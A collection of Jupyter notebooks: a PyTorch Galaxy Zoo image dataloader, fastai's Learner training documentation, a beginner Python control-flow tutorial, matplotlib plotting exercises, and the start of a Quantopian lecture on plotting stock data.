Image.open(file_img) if self.transform: image = self.transform(image) label = self.df.iloc[[index]][self.label_tag].values[0] return image, label def __len__(self): return len(self.df) ``` ``dir_image`` : path to the [galaxy zoo 2 images](https://www.kaggle.com/jaimetrickz/galaxy-zoo-2-images) ``` dir_image = '/home/hhg/Research/galaxyClassify/catalog/galaxyZoo_kaggle/gz2_images/images' dataset_train = GalaxyZooDataset(df_train, dir_image, label_tag='label_8') i = 34 df_train.iloc[[i]] image_i, label_i = dataset_train[i] print('label1 =',label_i) fig, ax = plt.subplots() ax.imshow(image_i) ax.axis('off') ``` ## dataloader ``` from torch.utils.data import DataLoader import torchvision.transforms as transforms def create_transforms(): input_size = 224 # transforms for training data train_transform = transforms.Compose([transforms.CenterCrop(input_size), transforms.RandomRotation(90), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.RandomResizedCrop(input_size, scale=(0.85, 1.0), ratio=(0.9, 1.1)), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) # transforms for validation data valid_transform = transforms.Compose([transforms.CenterCrop(input_size), transforms.RandomRotation(90), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.RandomResizedCrop(input_size, scale=(0.85, 1.0), ratio=(0.9, 1.1)), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) # transforms for test data test_transform = transforms.Compose([transforms.CenterCrop(input_size), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) return train_transform, valid_transform, test_transform BATCH_SIZE = 64 workers = 2 # create transforms train_transform, valid_transform, test_transform = create_transforms() # create datasets data_train = GalaxyZooDataset(df_train, dir_image, transform=train_transform, label_tag='label1') data_valid = GalaxyZooDataset(df_valid, dir_image, transform=valid_transform, label_tag='label1') data_test = GalaxyZooDataset(df_test , dir_image, transform=test_transform , label_tag='label1') # dataloaders train_loader = DataLoader(data_train, batch_size=BATCH_SIZE, shuffle=True, num_workers=workers) valid_loader = DataLoader(data_valid, batch_size=BATCH_SIZE, shuffle=True, num_workers=workers) test_loader = DataLoader(data_test , batch_size=BATCH_SIZE, shuffle=True, num_workers=workers) # check the sizes print(f'Number of training data: {len(data_train)} ({len(train_loader)} batches)') print(f'Number of validation data: {len(data_valid)} ({len(valid_loader)} batches)') print(f'Number of test data: {len(data_test)} ({len(test_loader)} batches)') ``` ## ------------ compute the mean and std of the galaxy image dataset------------ ``` import torch from tqdm.notebook import tqdm from time import time basic_transform = transforms.Compose([transforms.CenterCrop(224), transforms.ToTensor()]) data_full0 = GalaxyZooDataset(df, dir_image, transform=basic_transform, label_tag='label_8') full_loader0 = DataLoader(data_full0, batch_size=1, shuffle=True, num_workers=2) n_channels = 3 before = time() mean = torch.zeros(n_channels) std = torch.zeros(n_channels) print('==> Computing mean and std..') for images, _labels in tqdm(full_loader0): for i in range(n_channels): mean[i] += images[:,i,:,:].mean() std[i] += images[:,i,:,:].std() mean = mean/len(full_loader0) std = std /len(full_loader0) print('Full galaxy dataset mean :', mean) print('Full galaxy dataset std :', std) ```
github_jupyter
## Basic training functionality ``` from fastai.basic_train import * from fastai.gen_doc.nbdoc import * from fastai.vision import * from fastai.distributed import * ``` [`basic_train`](/basic_train.html#basic_train) wraps together the data (in a [`DataBunch`](/basic_data.html#DataBunch) object) with a PyTorch model to define a [`Learner`](/basic_train.html#Learner) object. Here the basic training loop is defined for the [`fit`](/basic_train.html#fit) method. The [`Learner`](/basic_train.html#Learner) object is the entry point of most of the [`Callback`](/callback.html#Callback) objects that will customize this training loop in different ways. Some of the most commonly used customizations are available through the [`train`](/train.html#train) module, notably: - [`Learner.lr_find`](/train.html#lr_find) will launch an LR range test that will help you select a good learning rate. - [`Learner.fit_one_cycle`](/train.html#fit_one_cycle) will launch a training using the 1cycle policy to help you train your model faster. - [`Learner.to_fp16`](/train.html#to_fp16) will convert your model to half precision and help you launch a training in mixed precision. ``` show_doc(Learner, title_level=2) ``` The main purpose of [`Learner`](/basic_train.html#Learner) is to train `model` using [`Learner.fit`](/basic_train.html#Learner.fit). After every epoch, all *metrics* will be printed and also made available to callbacks. The default weight decay will be `wd`, which will be handled using the method from [Fixing Weight Decay Regularization in Adam](https://arxiv.org/abs/1711.05101) if `true_wd` is set (otherwise it's L2 regularization). If `true_wd` is set it will affect all optimizers, not only Adam. If `bn_wd` is `False`, then weight decay will be removed from batchnorm layers, as recommended in [Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour](https://arxiv.org/abs/1706.02677). If `train_bn`, batchnorm layer learnable params are trained even for frozen layer groups. To use [discriminative layer training](#Discriminative-layer-training), pass a list of [`nn.Module`](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) as `layer_groups`; each [`nn.Module`](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) will be used to customize the optimization of the corresponding layer group. If `path` is provided, all the model files created will be saved in `path`/`model_dir`; if not, then they will be saved in `data.path`/`model_dir`. You can pass a list of [`callback`](/callback.html#callback)s that you have already created, or (more commonly) simply pass a list of callback functions to `callback_fns` and each function will be called (passing `self`) on object initialization, with the results stored as callback objects. For a walk-through, see the [training overview](/training.html) page. You may also want to use an [application](applications.html) specific model. For example, if you are dealing with a vision dataset, here the MNIST, you might want to use the [`cnn_learner`](/vision.learner.html#cnn_learner) method: ``` path = untar_data(URLs.MNIST_SAMPLE) data = ImageDataBunch.from_folder(path) learn = cnn_learner(data, models.resnet18, metrics=accuracy) ``` ### Model fitting methods ``` show_doc(Learner.lr_find) ``` Runs the learning rate finder defined in [`LRFinder`](/callbacks.lr_finder.html#LRFinder), as discussed in [Cyclical Learning Rates for Training Neural Networks](https://arxiv.org/abs/1506.01186). ``` learn.lr_find() learn.recorder.plot() show_doc(Learner.fit) ``` Uses [discriminative layer training](#Discriminative-layer-training) if multiple learning rates or weight decay values are passed. To control training behaviour, use the [`callback`](/callback.html#callback) system or one or more of the pre-defined [`callbacks`](/callbacks.html#callbacks). ``` learn.fit(1) show_doc(Learner.fit_one_cycle) ``` Use cycle length `cyc_len`, a per cycle maximal learning rate `max_lr`, momentum `moms`, division factor `div_factor`, weight decay `wd`, and optional callbacks [`callbacks`](/callbacks.html#callbacks). Uses the [`OneCycleScheduler`](/callbacks.one_cycle.html#OneCycleScheduler) callback. Please refer to [What is 1-cycle](/callbacks.one_cycle.html#What-is-1cycle?) for a conceptual background of 1-cycle training policy and more technical details on what do the method's arguments do. ``` learn.fit_one_cycle(1) ``` ### See results ``` show_doc(Learner.predict) ``` `predict` can be used to get a single prediction from the trained learner on one specific piece of data you are interested in. ``` learn.data.train_ds[0] ``` Each element of the dataset is a tuple, where the first element is the data itself, while the second element is the target label. So to get the data, we need to index one more time. ``` data = learn.data.train_ds[0][0] data pred = learn.predict(data) pred ``` The first two elements of the tuple are, respectively, the predicted class and label. Label here is essentially an internal representation of each class, since class name is a string and cannot be used in computation. To check what each label corresponds to, run: ``` learn.data.classes ``` So category 0 is 3 while category 1 is 7. ``` probs = pred[2] ``` The last element in the tuple is the predicted probabilities. For a categorization dataset, the number of probabilities returned is the same as the number of classes; `probs[i]` is the probability that the `item` belongs to `learn.data.classes[i]`. ``` learn.data.valid_ds[0][0] ``` You could always check yourself if the probabilities given make sense. ``` show_doc(Learner.get_preds) ``` It will run inference using the learner on all the data in the `ds_type` dataset and return the predictions; if `n_batch` is not specified, it will run the predictions on the default batch size. If `with_loss`, it will also return the loss on each prediction. Here is how you check the default batch size. ``` learn.data.batch_size preds = learn.get_preds() preds ``` The first element of the tuple is a tensor that contains all the predictions. ``` preds[0] ``` While the second element of the tuple is a tensor that contains all the target labels. ``` preds[1] preds[1][0] ``` For more details about what each number mean, refer to the documentation of [`predict`](/basic_train.html#predict). Since [`get_preds`](/basic_train.html#get_preds) gets predictions on all the data in the `ds_type` dataset, here the number of predictions will be equal to the number of data in the validation dataset. ``` len(learn.data.valid_ds) len(preds[0]), len(preds[1]) ``` To get predictions on the entire training dataset, simply set the `ds_type` argument accordingly. ``` learn.get_preds(ds_type=DatasetType.Train) ``` To also get prediction loss along with the predictions and the targets, set `with_loss=True` in the arguments. ``` learn.get_preds(with_loss=True) ``` Note that the third tensor in the output tuple contains the losses. ``` show_doc(Learner.validate) ``` Return the calculated loss and the metrics of the current model on the given data loader `dl`. The default data loader `dl` is the validation dataloader. You can check the default metrics of the learner using: ``` str(learn.metrics) learn.validate() learn.validate(learn.data.valid_dl) learn.validate(learn.data.train_dl) show_doc(Learner.show_results) ``` Note that the text number on the top is the ground truth, or the target label, the one in the middle is the prediction, while the image number on the bottom is the image data itself. ``` learn.show_results() learn.show_results(ds_type=DatasetType.Train) show_doc(Learner.pred_batch) ``` Note that the number of predictions given equals to the batch size. ``` learn.data.batch_size preds = learn.pred_batch() len(preds) ``` Since the total number of predictions is too large, we will only look at a part of them. ``` preds[:10] item = learn.data.train_ds[0][0] item batch = learn.data.one_item(item) batch learn.pred_batch(batch=batch) show_doc(Learner.interpret, full_name='interpret') jekyll_note('This function only works in the vision application.') ``` For more details, refer to [ClassificationInterpretation](/vision.learner.html#ClassificationInterpretation) ### Model summary ``` show_doc(Learner.summary) ``` ### Test time augmentation ``` show_doc(Learner.TTA, full_name = 'TTA') ``` Applies Test Time Augmentation to `learn` on the dataset `ds_type`. We take the average of our regular predictions (with a weight `beta`) with the average of predictions obtained through augmented versions of the training set (with a weight `1-beta`). The transforms decided for the training set are applied with a few changes `scale` controls the scale for zoom (which isn't random), the cropping isn't random but we make sure to get the four corners of the image. Flipping isn't random but applied once on each of those corner images (so that makes 8 augmented versions total). ### Gradient clipping ``` show_doc(Learner.clip_grad) ``` ### Mixed precision training ``` show_doc(Learner.to_fp16) ``` Uses the [`MixedPrecision`](/callbacks.fp16.html#MixedPrecision) callback to train in mixed precision (i.e. forward and backward passes using fp16, with weight updates using fp32), using all [NVIDIA recommendations](https://docs.nvidia.com/deeplearning/sdk/mixed-precision-training/index.html) for ensuring speed and accuracy. ``` show_doc(Learner.to_fp32) ``` ### Distributed training If you want to use ditributed training or [`torch.nn.DataParallel`](https://pytorch.org/docs/stable/nn.html#torch.nn.DataParallel) these will directly wrap the model for you. ``` show_doc(Learner.to_distributed, full_name='to_distributed') show_doc(Learner.to_parallel, full_name='to_parallel') ``` ### Discriminative layer training When fitting a model you can pass a list of learning rates (and/or weight decay amounts), which will apply a different rate to each *layer group* (i.e. the parameters of each module in `self.layer_groups`). See the [Universal Language Model Fine-tuning for Text Classification](https://arxiv.org/abs/1801.06146) paper for details and experimental results in NLP (we also frequently use them successfully in computer vision, but have not published a paper on this topic yet). When working with a [`Learner`](/basic_train.html#Learner) on which you've called `split`, you can set hyperparameters in four ways: 1. `param = [val1, val2 ..., valn]` (n = number of layer groups) 2. `param = val` 3. `param = slice(start,end)` 4. `param = slice(end)` If we chose to set it in way 1, we must specify a number of values exactly equal to the number of layer groups. If we chose to set it in way 2, the chosen value will be repeated for all layer groups. See [`Learner.lr_range`](/basic_train.html#Learner.lr_range) for an explanation of the `slice` syntax). Here's an example of how to use discriminative learning rates (note that you don't actually need to manually call [`Learner.split`](/basic_train.html#Learner.split) in this case, since fastai uses this exact function as the default split for `resnet18`; this is just to show how to customize it): ``` # creates 3 layer groups learn.split(lambda m: (m[0][6], m[1])) # only randomly initialized head now trainable learn.freeze() learn.fit_one_cycle(1) # all layers now trainable learn.unfreeze() # optionally, separate LR and WD for each group learn.fit_one_cycle(1, max_lr=(1e-4, 1e-3, 1e-2), wd=(1e-4,1e-4,1e-1)) show_doc(Learner.lr_range) ``` Rather than manually setting an LR for every group, it's often easier to use [`Learner.lr_range`](/basic_train.html#Learner.lr_range). This is a convenience method that returns one learning rate for each layer group. If you pass `slice(start,end)` then the first group's learning rate is `start`, the last is `end`, and the remaining are evenly geometrically spaced. If you pass just `slice(end)` then the last group's learning rate is `end`, and all the other groups are `end/10`. For instance (for our learner that has 3 layer groups): ``` learn.lr_range(slice(1e-5,1e-3)), learn.lr_range(slice(1e-3)) show_doc(Learner.unfreeze) ``` Sets every layer group to *trainable* (i.e. `requires_grad=True`). ``` show_doc(Learner.freeze) ``` Sets every layer group except the last to *untrainable* (i.e. `requires_grad=False`). What does '**the last layer group**' mean? In the case of transfer learning, such as `learn = cnn_learner(data, models.resnet18, metrics=error_rate)`, `learn.model`will print out two large groups of layers: (0) Sequential and (1) Sequental in the following structure. We can consider the last conv layer as the break line between the two groups. ``` Sequential( (0): Sequential( (0): Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False) (1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) (2): ReLU(inplace) ... (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False) (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) ) ) ) (1): Sequential( (0): AdaptiveConcatPool2d( (ap): AdaptiveAvgPool2d(output_size=1) (mp): AdaptiveMaxPool2d(output_size=1) ) (1): Flatten() (2): BatchNorm1d(1024, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) (3): Dropout(p=0.25) (4): Linear(in_features=1024, out_features=512, bias=True) (5): ReLU(inplace) (6): BatchNorm1d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) (7): Dropout(p=0.5) (8): Linear(in_features=512, out_features=12, bias=True) ) ) ``` `learn.freeze` freezes the first group and keeps the second or last group free to train, including multiple layers inside (this is why calling it 'group'), as you can see in `learn.summary()` output. How to read the table below, please see [model summary docs](/callbacks.hooks.html#model_summary). ``` ====================================================================== Layer (type) Output Shape Param # Trainable ====================================================================== ... ... ... ______________________________________________________________________ Conv2d [1, 512, 4, 4] 2,359,296 False ______________________________________________________________________ BatchNorm2d [1, 512, 4, 4] 1,024 True ______________________________________________________________________ AdaptiveAvgPool2d [1, 512, 1, 1] 0 False ______________________________________________________________________ AdaptiveMaxPool2d [1, 512, 1, 1] 0 False ______________________________________________________________________ Flatten [1, 1024] 0 False ______________________________________________________________________ BatchNorm1d [1, 1024] 2,048 True ______________________________________________________________________ Dropout [1, 1024] 0 False ______________________________________________________________________ Linear [1, 512] 524,800 True ______________________________________________________________________ ReLU [1, 512] 0 False ______________________________________________________________________ BatchNorm1d [1, 512] 1,024 True ______________________________________________________________________ Dropout [1, 512] 0 False ______________________________________________________________________ Linear [1, 12] 6,156 True ______________________________________________________________________ Total params: 11,710,540 Total trainable params: 543,628 Total non-trainable params: 11,166,912 ``` ``` show_doc(Learner.freeze_to) ``` From above we know what is layer group, but **what exactly does `freeze_to` do behind the scenes**? The `freeze_to` source code can be understood as the following pseudo-code: ```python def freeze_to(self, n:int)->None: for g in self.layer_groups[:n]: freeze for g in self.layer_groups[n:]: unfreeze ``` In other words, for example, `freeze_to(1)` is to freeze layer group 0 and unfreeze the rest layer groups, and `freeze_to(3)` is to freeze layer groups 0, 1, and 2 but unfreeze the rest layer groups (if there are more layer groups left). Both `freeze` and `unfreeze` [sources](https://github.com/fastai/fastai/blob/master/fastai/basic_train.py#L216) are defined using `freeze_to`: - When we say `freeze`, we mean that in the specified layer groups the [`requires_grad`](/torch_core.html#requires_grad) of all layers with weights (except BatchNorm layers) are set `False`, so the layer weights won't be updated during training. - when we say `unfreeze`, we mean that in the specified layer groups the [`requires_grad`](/torch_core.html#requires_grad) of all layers with weights (except BatchNorm layers) are set `True`, so the layer weights will be updated during training. ``` show_doc(Learner.split) ``` A convenience method that sets `layer_groups` based on the result of [`split_model`](/torch_core.html#split_model). If `split_on` is a function, it calls that function and passes the result to [`split_model`](/torch_core.html#split_model) (see above for example). ### Saving and loading models Simply call [`Learner.save`](/basic_train.html#Learner.save) and [`Learner.load`](/basic_train.html#Learner.load) to save and load models. Only the parameters are saved, not the actual architecture (so you'll need to create your model in the same way before loading weights back in). Models are saved to the `path`/`model_dir` directory. ``` show_doc(Learner.save) ``` If argument `name` is a pathlib object that's an absolute path, it'll override the default base directory (`learn.path`), otherwise the model will be saved in a file relative to `learn.path`. ``` learn.save("trained_model") learn.save("trained_model", return_path=True) show_doc(Learner.load) ``` This method only works after `save` (don't confuse with `export`/[`load_learner`](/basic_train.html#load_learner) pair). If the `purge` argument is `True` (default) `load` internally calls `purge` with `clear_opt=False` to presever `learn.opt`. ``` learn = learn.load("trained_model") ``` ### Deploying your model When you are ready to put your model in production, export the minimal state of your [`Learner`](/basic_train.html#Learner) with: ``` show_doc(Learner.export) ``` If argument `fname` is a pathlib object that's an absolute path, it'll override the default base directory (`learn.path`), otherwise the model will be saved in a file relative to `learn.path`. Passing `destroy=True` will destroy the [`Learner`](/basic_train.html#Learner), freeing most of its memory consumption. For specifics see [`Learner.destroy`](/basic_train.html#Learner.destroy). This method only works with the [`Learner`](/basic_train.html#Learner) whose [`data`](/vision.data.html#vision.data) was created through the [data block API](/data_block.html). Otherwise, you will have to create a [`Learner`](/basic_train.html#Learner) yourself at inference and load the model with [`Learner.load`](/basic_train.html#Learner.load). ``` learn.export() learn.export('trained_model.pkl') path = learn.path path show_doc(load_learner) ``` This function only works after `export` (don't confuse with `save`/`load` pair). The `db_kwargs` will be passed to the call to `databunch` so you can specify a `bs` for the test set, or `num_workers`. ``` learn = load_learner(path) learn = load_learner(path, 'trained_model.pkl') ``` WARNING: If you used any customized classes when creating your learner, you must first define these classes first before executing [`load_learner`](/basic_train.html#load_learner). You can find more information and multiple examples in [this tutorial](/tutorial.inference.html). ### Freeing memory If you want to be able to do more without needing to restart your notebook, the following methods are designed to free memory when it's no longer needed. Refer to [this tutorial](/tutorial.resources.html) to learn how and when to use these methods. ``` show_doc(Learner.purge) ``` If `learn.path` is read-only, you can set `model_dir` attribute in Learner to a full `libpath` path that is writable (by setting `learn.model_dir` or passing `model_dir` argument in the [`Learner`](/basic_train.html#Learner) constructor). ``` show_doc(Learner.destroy) ``` If you need to free the memory consumed by the [`Learner`](/basic_train.html#Learner) object, call this method. It can also be automatically invoked through [`Learner.export`](/basic_train.html#Learner.export) via its `destroy=True` argument. ### Other methods ``` show_doc(Learner.init) ``` Initializes all weights (except batchnorm) using function `init`, which will often be from PyTorch's [`nn.init`](https://pytorch.org/docs/stable/nn.html#torch-nn-init) module. ``` show_doc(Learner.mixup) ``` Uses [`MixUpCallback`](/callbacks.mixup.html#MixUpCallback). ``` show_doc(Learner.backward) show_doc(Learner.create_opt) ``` You generally won't need to call this yourself - it's used to create the [`optim`](https://pytorch.org/docs/stable/optim.html#module-torch.optim) optimizer before fitting the model. ``` show_doc(Learner.dl) learn.dl() learn.dl(DatasetType.Train) show_doc(Recorder, title_level=2) ``` A [`Learner`](/basic_train.html#Learner) creates a [`Recorder`](/basic_train.html#Recorder) object automatically - you do not need to explicitly pass it to `callback_fns` - because other callbacks rely on it being available. It stores the smoothed loss, hyperparameter values, and metrics for each batch, and provides plotting methods for each. Note that [`Learner`](/basic_train.html#Learner) automatically sets an attribute with the snake-cased name of each callback, so you can access this through `Learner.recorder`, as shown below. ### Plotting methods ``` show_doc(Recorder.plot) ``` This is mainly used with the learning rate finder, since it shows a scatterplot of loss vs learning rate. ``` path = untar_data(URLs.MNIST_SAMPLE) data = ImageDataBunch.from_folder(path) learn = cnn_learner(data, models.resnet18, metrics=accuracy) learn.lr_find() learn.recorder.plot() show_doc(Recorder.plot_losses) ``` Note that validation losses are only calculated once per epoch, whereas training losses are calculated after every batch. ``` learn.fit_one_cycle(5) learn.recorder.plot_losses() show_doc(Recorder.plot_lr) learn.recorder.plot_lr() learn.recorder.plot_lr(show_moms=True) show_doc(Recorder.plot_metrics) ``` Note that metrics are only collected at the end of each epoch, so you'll need to train at least two epochs to have anything to show here. ``` learn.recorder.plot_metrics() ``` ### Callback methods You don't call these yourself - they're called by fastai's [`Callback`](/callback.html#Callback) system automatically to enable the class's functionality. Refer to [`Callback`](/callback.html#Callback) for more details. ``` show_doc(Recorder.on_backward_begin) show_doc(Recorder.on_batch_begin) show_doc(Recorder.on_epoch_end) show_doc(Recorder.on_train_begin) ``` ### Inner functions The following functions are used along the way by the [`Recorder`](/basic_train.html#Recorder) or can be called by other callbacks. ``` show_doc(Recorder.add_metric_names) show_doc(Recorder.format_stats) ``` ## Module functions Generally you'll want to use a [`Learner`](/basic_train.html#Learner) to train your model, since they provide a lot of functionality and make things easier. However, for ultimate flexibility, you can call the same underlying functions that [`Learner`](/basic_train.html#Learner) calls behind the scenes: ``` show_doc(fit) ``` Note that you have to create the [`Optimizer`](https://pytorch.org/docs/stable/optim.html#torch.optim.Optimizer) yourself if you call this function, whereas [`Learn.fit`](/basic_train.html#fit) creates it for you automatically. ``` show_doc(train_epoch) ``` You won't generally need to call this yourself - it's what [`fit`](/basic_train.html#fit) calls for each epoch. ``` show_doc(validate) ``` This is what [`fit`](/basic_train.html#fit) calls after each epoch. You can call it if you want to run inference on a [`DataLoader`](https://pytorch.org/docs/stable/data.html#torch.utils.data.DataLoader) manually. ``` show_doc(get_preds) show_doc(loss_batch) ``` You won't generally need to call this yourself - it's what [`fit`](/basic_train.html#fit) and [`validate`](/basic_train.html#validate) call for each batch. It only does a backward pass if you set `opt`. ## Other classes ``` show_doc(LearnerCallback, title_level=3) show_doc(RecordOnCPU, title_level=3) ``` ## Open This Notebook <button style="display: flex; align-item: center; padding: 4px 8px; font-size: 14px; font-weight: 700; color: #1976d2; cursor: pointer;" onclick="window.location.href = 'https://console.cloud.google.com/mlengine/notebooks/deploy-notebook?q=download_url%3Dhttps%253A%252F%252Fraw.githubusercontent.com%252Ffastai%252Ffastai%252Fmaster%252Fdocs_src%252Fbasic_train.ipynb';"><img src="https://www.gstatic.com/images/branding/product/1x/cloud_24dp.png" /><span style="line-height: 24px; margin-left: 10px;">Open in GCP Notebooks</span></button> ## Undocumented Methods - Methods moved below this line will intentionally be hidden ``` show_doc(Learner.tta_only) show_doc(Learner.TTA) show_doc(RecordOnCPU.on_batch_begin) ``` ## New Methods - Please document or move to the undocumented section
github_jupyter
###Conditional Statement * if * if-else * if-elif-else ###Loops and Iterations * for * while ###Recursion * Function calling iteself ###Break * Stop iteration ###Continue * Stop current iteration ###Pass * Passing for non-executable condition 📌After using **:**, it is necessary to shift each statement by 4 whitespace to keep inside the loop/condition_statement <h3>⭐if</h3> ``` if True: print("Hello") #carefully look at the shift of 4 whitespace if False: print('Hello, World!') num = 2 if num > 0: print('It is possible to print') if num >= 0 or num <= 3: print('It is possible to print') if num >= 0 and num <= 3: print('It is possible to print') if num >= 0 or num >= 4: print('It is possible to print') if num >= 0 and num >= 4: print('It is not possible to print') ``` <h3>⭐if-else</h3> ``` if False: print('False statement') else: print('True statement') num = 5 if num > 6: print('greater than 6') else: print('not greater than 6') if num < 6: if num > 3: print('smaller than 6 but greater than 3') if num < 3: print('smaller than 6 but not than 3') else: print('greater than 6') if num > 6: if num > 3: print('smaller than 6 but greater than 3') if num < 3: print('smaller than 6 but not than 3') else: if num > 3: print('smaller than or equal to 6 but greater than 3') ``` <h3>⭐if-elif-else</h3> ``` a = 60 b = 70 c = 80 d = 90 e = 95 num = 100 if num <= a: print(num,'is less than equal to',a) elif num <= b: print(num,'is less than equal to',b) elif num <= c: print(num,'is less than equal to',c) elif num <= d: print(num,'is less than equal to',b) else: print('What\'s going on...') a = 10 if a == 5: print('a is equal to',a) elif a ==10: print('a is equal to',a) else: print('I don\'t know') ``` <h3>⭐For-loop</h3> ``` for i in range(10): #📌range() is built-in function starting from 0 to n-1 print(i) print('outside of loop') print(range(1,10)) print(list(range(10))) print(list(range(1,10))) for i in range(5): for j in range(5): print('i =',i,'j =',j) lis = [1,2,3,4,5,6,7,8,9,10] sum = 0 for i in lis: sum += i print('Now the sum is',sum) for i in 'Hello, World!': print(i) for i in [1,2.3, '4',[12,34],(1,23,4),{1,23,4},{'1':'one'}]: print('Datatype of',i,'is',type(i)) ``` <h3>⭐While-loop</h3> Executes until a condition is True ``` n = 32 while n <= 37: print('Executed because value of n is',n,'which is <= 37') n += 1 temp = True i = 1 while temp: print('Hey, I\'m inside the while loop') if i == 5: temp = False print('Now, temp became False and I have to come out of while loop') i += 1 ``` <h3>⭐Recursion</h3> In recursion, a function calls itself. ``` # Sum of numbers def sum_temp(n): if n == 1: #base condition return 1 return n + sum_temp(n-1) # 3 + 2 + 1 = 6 sum_temp(3) # Factorial def fact(n): if n == 0: return 1 return n*fact(n-1) fact(3) ``` <h3>⭐Break</h3> ...stopping iteration ``` for i in range(10): print('The value of i is',i) if i == 5: print('Breaking because i is',5) break #No execution for 6,7,8,9 ``` <h3>⭐Continue</h3> ...stopping current iteration ``` for i in range(10): if i>5: continue else: print('still running') ``` <h3>⭐Pass</h3> Useful if we will write some code inside a block but not now ``` for i in range(10): pass ```
github_jupyter
``` #1. Use matplotlib to plot the following equation: # y = x^2 -x + 2 #You'll need to write the code that generates the x and y points. #Add an anotation for the point 0, 0, the origin. import matplotlib.pyplot as plt x = list(range(-50, 50)) # generate our y values y = [(n ** 2 - n + 2) for n in x] plt.plot(x, y) # title plt.title('$y = x^{2} - x + 2$') # annotate the origin plt.annotate('Origin', xy=(0, 0), xytext=(-5, 500)) plt.show() #2. Create and label 4 separate charts for the following equations #(choose a range for x that makes sense): y = √x y = x^3 y= 2^x y= 1/(x +1) from math import sqrt # When sqrt involved x cannot be less than 0 x = list(range(0, 50)) # generate y y = [sqrt(n) for n in x] plt.plot(x, y) plt.title('$\sqrt{x}$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #Plot x ** 3 # range of x x = list(range(-10, 10)) # generate y y = [n ** 3 for n in x] plt.plot(x, y) plt.title('$x^{3}$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #Plot y= 2 ** x # set range for x x = list(range(-10, 10)) # generate y y = [2 ** n for n in x] # plot x and y plt.plot(x, y) plt.title('$2^{x}$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #Plot y= 1/(x +1) # set range for x x = list(range(0, 10)) # generate y y = [1/(n +1) for n in x] # plot x and y plt.plot(x, y) plt.title('$1/(x +1)$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #3. Combine the figures you created in the last step into one large figure with 4 subplots. plt.figure(figsize = (20, 10)) # plot $\sqrt{x}$ plt.subplot(2, 2, 1) # # When sqrt involved x cannot be less than 0 x = list(range(0, 50)) # generate y y = [sqrt(n) for n in x] plt.plot(x, y) plt.title('$\sqrt{x}$') plt.ylabel('$y$') # plot x ** 3 plt.subplot(2, 2, 2) # range of x x = list(range(-10, 10)) # generate y y = [n ** 3 for n in x] plt.plot(x, y) plt.title('$x^{3}$') plt.xlabel('$x$') # plot y= 2 ** x plt.subplot(2, 2, 3) # set range for x x = list(range(-10, 10)) # generate y y = [2 ** n for n in x] # plot x and y plt.plot(x, y) plt.title('$2^{x}$') plt.xlabel('$x$') plt.ylabel('$y$') #Plot y= 1/(x +1) plt.subplot(2,2,4) # set range for x x = list(range(0, 10)) # generate y y = [1/(n +1) for n in x] # plot x and y plt.plot(x, y) plt.title('$1/(x +1)$') plt.xlabel('$x$') plt.ylabel('$y$') plt.show() #4. Combine the figures you created in the last step into : #-- One figure where each of the 4 equations has a different color for the points. #-- Be sure to include a legend and an appropriate title for the figure. x = list(range(0, 30)) # generate y for each fucntion y1 = [sqrt(n) for n in x] y2 = [n**3 for n in x] y3 = [2**n for n in x] y4 = [1/(n +1) for n in x] plt.plot(x, y1, c='slategray', label='$\sqrt{x}$', alpha=0.7) plt.plot(x, y2, c='cadetblue', label='$x^{3}$', alpha=0.6) plt.plot(x, y3, c='firebrick', label='$2^{x}$', alpha=0.5) plt.plot(x, y4, c='darkgoldenrod', label='$1/(x +1)$', alpha=0.5) plt.ylim(0, 15) plt.xlim(0, 15) plt.ylabel('$y$') plt.xlabel('$x$') plt.title('All Figures Combined') plt.legend() plt.show() ```
github_jupyter
``` %matplotlib inline import matplotlib.pyplot as plt plt.rcParams['font.sans-serif'] = ['SimHei'] plt.rcParams['axes.unicode_minus'] = False ``` # Graphical Representations of Data By Evgenia "Jenny" Nitishinskaya, Maxwell Margenot, and Delaney Granizo-Mackenzie. Part of the Quantopian Lecture Series: * [www.quantopian.com/lectures](https://www.quantopian.com/lectures) * [github.com/quantopian/research_public](https://github.com/quantopian/research_public) Notebook released under the Creative Commons Attribution 4.0 License. Representing data graphically can be incredibly useful for learning how the data behaves and seeing potential structure or flaws. Care should be taken, as humans are incredibly good at seeing only evidence that confirms our beliefs, and visual data lends itself well to that. Plots are good to use when formulating a hypothesis, but should not be used to test a hypothesis. We will go over some common plots here. ``` # Import our libraries # This is for numerical processing import numpy as np # This is the library most commonly used for plotting in Python. # Notice how we import it 'as' plt, this enables us to type plt # rather than the full string every time. import matplotlib.pyplot as plt ``` ## Getting Some Data If we're going to plot data we need some data to plot. We'll get the pricing data of Apple (000333) and Microsoft (000001) to use in our examples. ### Data Structure Knowing the structure of your data is very important. Normally you'll have to do a ton work molding your data into the form you need for testing. Quantopian has done a lot of cleaning on the data, but you still need to put it into the right shapes and formats for your purposes. In this case the data will be returned as a pandas dataframe object. The rows are timestamps, and the columns are the two assets, 000333 and 000001. ``` from zipline.component.data import load_bars start = '2014-01-01' end = '2015-01-01' data = load_bars(['000001', '000333'], start=start, end=end) data.head() ``` Indexing into the data with `data['000333']` will yield an error because the type of the columns are equity objects and not simple strings. Let's change that using this little piece of Python code. Don't worry about understanding it right now, unless you do, in which case congratulations. ``` data.head() ``` Much nicer, now we can index. Indexing into the 2D dataframe will give us a 1D series object. The index for the series is timestamps, the value upon index is a price. Similar to an array except instead of integer indecies it's times. ``` data['000001'].head() ``` ## 柱状图(Histogram) A histogram is a visualization of how frequent different values of data are. By displaying a frequency distribution using bars, it lets us 